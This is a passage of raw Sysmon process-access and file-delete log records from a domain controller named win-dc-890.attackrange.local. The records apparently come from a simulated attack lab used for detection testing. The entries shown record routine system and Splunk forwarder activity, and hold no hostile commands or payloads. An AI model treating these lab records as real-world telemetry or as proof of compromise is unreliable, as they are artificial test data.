Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC7910DC647CEAED360A927937667D1,SHA256=050604AFB07A519A132F0DD60A7ED74418768D75A081D9BDF272AD4EAFA07D3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.464{466BC892-F6B5-60EB-A67D-00000000CF01}14287284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.458{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.440{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.439{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.387{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.387{466BC892-02B0-60E8-1600-00000000CF01}13047824C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.372{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.340{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.340{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.340{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.287{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001052266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.139{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08EC9F6C14EDD29E4BF622AE06FA9B9A,SHA256=B5CD270AEDB4A99E1E59DB38BA2B47FC8E70CB0FCCBB7B04A3A42E8C3ABCB9B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.134{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 